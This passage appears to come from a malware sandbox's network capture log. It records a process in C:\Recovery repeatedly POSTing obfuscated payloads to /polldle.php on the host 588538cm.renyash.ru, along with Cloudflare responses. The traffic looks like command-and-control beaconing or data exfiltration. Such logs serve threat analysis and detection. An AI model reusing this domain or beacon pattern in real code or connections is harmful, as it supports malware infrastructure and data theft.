                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:17.379843950 CET2504OUTData Raw: 58 59 51 53 5f 46 5a 58 54 5d 55 5a 50 5a 59 5f 50 5d 5a 5f 57 5d 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYQS_FZXT]UZPZY_P]Z_W]PW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C96D2;?&T=3) <-(4(<<1&V-4'!3+%#X'/\/<
                                                                                Jan 11, 2025 23:33:17.477343082 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:17.733412981 CET812INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Go8UI%2Bq%2BWFoE0afw6OAZMc%2B3u7ixEn29mILEIo80tjfTzEejHgMBuHEMh%2F16Ok%2BPBG0ZvmQaHgo41Dh3%2BpEYozARfPqefe1ZDX9MYgZiJuC7JwcMY8616NL%2FJqVF1VcfqpFBZopo"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e1bfb0680df-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4817&min_rtt=1747&rtt_var=6796&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=55492&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.449861104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:17.867625952 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:18.223650932 CET2504OUTData Raw: 58 5d 54 50 5f 41 5f 5f 54 5d 55 5a 50 58 59 51 50 50 5a 5c 57 5c 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TP_A__T]UZPXYQPPZ\W\P[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- 11<]%29X'?#<*/;+<&U*R.47"T3(#X'/\/4
                                                                                Jan 11, 2025 23:33:18.327264071 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:18.542332888 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:18.564810991 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcJj4TRhGzX7uEpxX2QvtoTXIsQ95rkoYPxBPJ4v7xy31CwuBF%2BHG3IluMP9aET2w%2B4ZtNX5Z6STLW6o1JAdRprDJbEBjGuhNO1hxkZniyr3F0bvFyFCDgUmiTybynWPUusqhvFi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e214cc78c3f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8415&min_rtt=2052&rtt_var=13496&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=27568&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.449867104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:18.696016073 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:19.051716089 CET2500OUTData Raw: 58 5d 51 55 5a 45 5a 5d 54 5d 55 5a 50 5c 59 51 50 5d 5a 5e 57 50 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QUZEZ]T]UZP\YQP]Z^WPP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- )$;/1!5'& >8+)/W1&U:!T0?%#X'/\/
                                                                                Jan 11, 2025 23:33:19.143745899 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:19.435286045 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8S2VwkGX%2BEhn%2BNcwq0siVyV2e3VlhOpn6BBStALp9t5m%2FubEfZoutUIdZaVi7usynnB4g%2BFZ4IREuM5O5lT2DuM6TEeSijZar1Kx7pL1%2FUzeQv8YM4MPik12hP7GwCDLLr30ca2"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e266b627279-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2004&rtt_var=858&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=600082&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:19.522624969 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.449873104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:19.660131931 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:20.004890919 CET2504OUTData Raw: 5d 5c 54 5f 5a 41 5a 5e 54 5d 55 5a 50 5b 59 50 50 50 5a 53 57 5d 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\T_ZAZ^T]UZP[YPPPZSW]PX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G,#2(1"!$Y1 /6/+?'T&#T.$?#!$+#X'/\/
                                                                                Jan 11, 2025 23:33:20.121726036 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:20.363137007 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9BC%2BOjj%2BOS0%2BxpPgFc%2BwNuL3Wyr8PUNr41jLdeWQX4hGyQKuSzB0GzlGcRqRO46nJdaPQ%2BE83VAHNC%2BYEEgCfI37jn6sxs16QfqxKT8j4bsvuHL938kwjojZFIEshiJCtOZNN120"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e2c7d3b0f4b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4426&min_rtt=1579&rtt_var=6287&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=59936&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.449879104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:20.494895935 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:20.848649979 CET2504OUTData Raw: 5d 59 54 55 5f 46 5a 5a 54 5d 55 5a 50 5b 59 50 50 50 5a 52 57 55 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTU_FZZT]UZP[YPPPZRWUP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -#&2<&!>%?T &;'_(23.'(#"?#X'/\/
                                                                                Jan 11, 2025 23:33:20.959706068 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.449885104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:21.167808056 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:21.520459890 CET1620OUTData Raw: 5d 5a 51 54 5f 45 5a 5c 54 5d 55 5a 50 58 59 5f 50 5c 5a 58 57 56 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZQT_EZ\T]UZPXY_P\ZXWVP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -2@2#12)3#;#+3$#R.8!,+%#X'/\/4
                                                                                Jan 11, 2025 23:33:21.636883974 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:21.888324022 CET947INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HrBN8aRTILWbxxIvV9dXtS0IPjMnXf91PyBEBOrm4hObvFQzlITT4OynmcjIxB0TuqEn067Ck0mdzQ0gZRXHsyDRggDzx8o6jwNGsuqGq4IV2goouyHuIoZvI8S85oHu8m6QJ3mD"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e35f8f77d05-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4986&min_rtt=2032&rtt_var=6671&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=56877&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0e 30 1a 0e 58 3e 00 37 5a 3a 3b 30 02 39 32 20 1d 2a 57 2a 5f 20 2a 20 11 27 22 0e 1a 3f 2a 29 06 3f 3a 09 56 20 07 3e 1e 26 13 23 46 0c 1d 22 5c 3d 06 3c 1a 25 2c 24 5d 29 30 2d 03 27 32 27 1d 3e 1d 37 55 3e 14 39 15 21 3c 04 51 3f 31 3d 51 29 36 31 02 38 32 3f 5c 26 10 2e 51 0f 16 22 0d 21 22 3b 04 37 2e 37 14 31 23 24 03 3c 1a 3f 00 25 14 0e 52 2b 33 04 13 2b 22 3f 0d 33 03 23 54 26 2c 22 17 28 5f 23 1a 3c 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-0X>7Z:;092 *W*_ * '"?*)?:V >&#F"\=<%,$])0-'2'>7U>9!<Q?1=Q)6182?\&.Q"!";7.71#$<?%R+3+"?3#T&,"(_#<$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.449886104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:21.293941975 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:21.645466089 CET2504OUTData Raw: 5d 5e 54 50 5a 40 5a 5a 54 5d 55 5a 50 5b 59 5a 50 5c 5a 52 57 52 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TPZ@ZZT]UZP[YZP\ZRWRP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.!1((X&2&0-U"/=Z;^(3W&32-$\62$(#X'/\/
                                                                                Jan 11, 2025 23:33:21.757096052 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:22.000773907 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W4qgTrIAvdxdZxjoJ8UYcL5x8hiRVTZgObgdGUCYUsQuwD3kc7m2QVVI3mB7koQ2iHd%2BF%2FL3IJmOl5yFVdREp1TL2W1iY2ksuFYSfAHGmVKgP8pEAYKBrmKAhP9M1gS1ul4lIGo%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e36bf5b0cba-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3259&min_rtt=1701&rtt_var=3755&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=103041&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.449892104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:22.137902021 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:22.489276886 CET2504OUTData Raw: 5d 59 51 57 5f 43 5f 5a 54 5d 55 5a 50 59 59 58 50 52 5a 58 57 53 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQW_C_ZT]UZPYYXPRZXWSPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.#:C180\%&0?U#<8(4(?7T$3.. !!/(#X'/\/0
                                                                                Jan 11, 2025 23:33:22.581279993 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:22.817150116 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3u5BtV5wkFR2Xq8TZxeQk7lbyXiErtndB%2BsYZX%2FfMEu4yUoUIUIIeSrZIi9ga8hxn2rPqCRnlGORXaVlMB3dz4H2S340%2BcetDW%2BK0WQZXeLtolpiPpVJ3a85e6sNCXBLk2R09wp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e3bee80c345-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3251&min_rtt=1661&rtt_var=3803&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=101501&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.449898104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:23.050952911 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:23.410994053 CET2504OUTData Raw: 5d 5d 54 5e 5a 42 5a 5c 54 5d 55 5a 50 58 59 5b 50 54 5a 5a 57 53 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]T^ZBZ\T]UZPXY[PTZZWSPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G.#A$(,11:$5 9Y;8<?V19461?Z<#X'/\/4
                                                                                Jan 11, 2025 23:33:23.514339924 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:23.761473894 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CiNuZ%2FRGEjXs6ubjjtr0tl7nnylPgNVLXIHxcg%2BuWR95shFJL0W%2FQJ4OAuXRawr7WZTvFKCb9%2BpGv3n2U%2FZ840HC3WwNVlD3x1B9f2VwvbxYZtNVegwCXy6iP5YLNTcvpODYTKsR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e41ac23c46b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4111&min_rtt=1480&rtt_var=5818&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=64790&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.449904104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:23.888215065 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:24.239311934 CET2504OUTData Raw: 58 50 54 55 5a 49 5a 5a 54 5d 55 5a 50 5f 59 51 50 5c 5a 52 57 51 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPTUZIZZT]UZP_YQP\ZRWQP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.9$8,$"_0&7<=-+$<?,$06R:7"13+5#X'/\/(
                                                                                Jan 11, 2025 23:33:24.341195107 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:24.577214956 CET811INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6m7C68TGR1%2BdVI8tpjO%2FRSD8DYRln89%2BUkN1AE6MpAzN0C0hIDVwaOKXL3KmBedOpOVLWkQthUa7Wn6zgpckirrzB7i%2FeKJ8GJv%2FkKjp2%2Frw9hepWN1VUbFscsUzReIYKL6EUcp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e46dd88433f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8194&min_rtt=1785&rtt_var=13487&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=27517&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
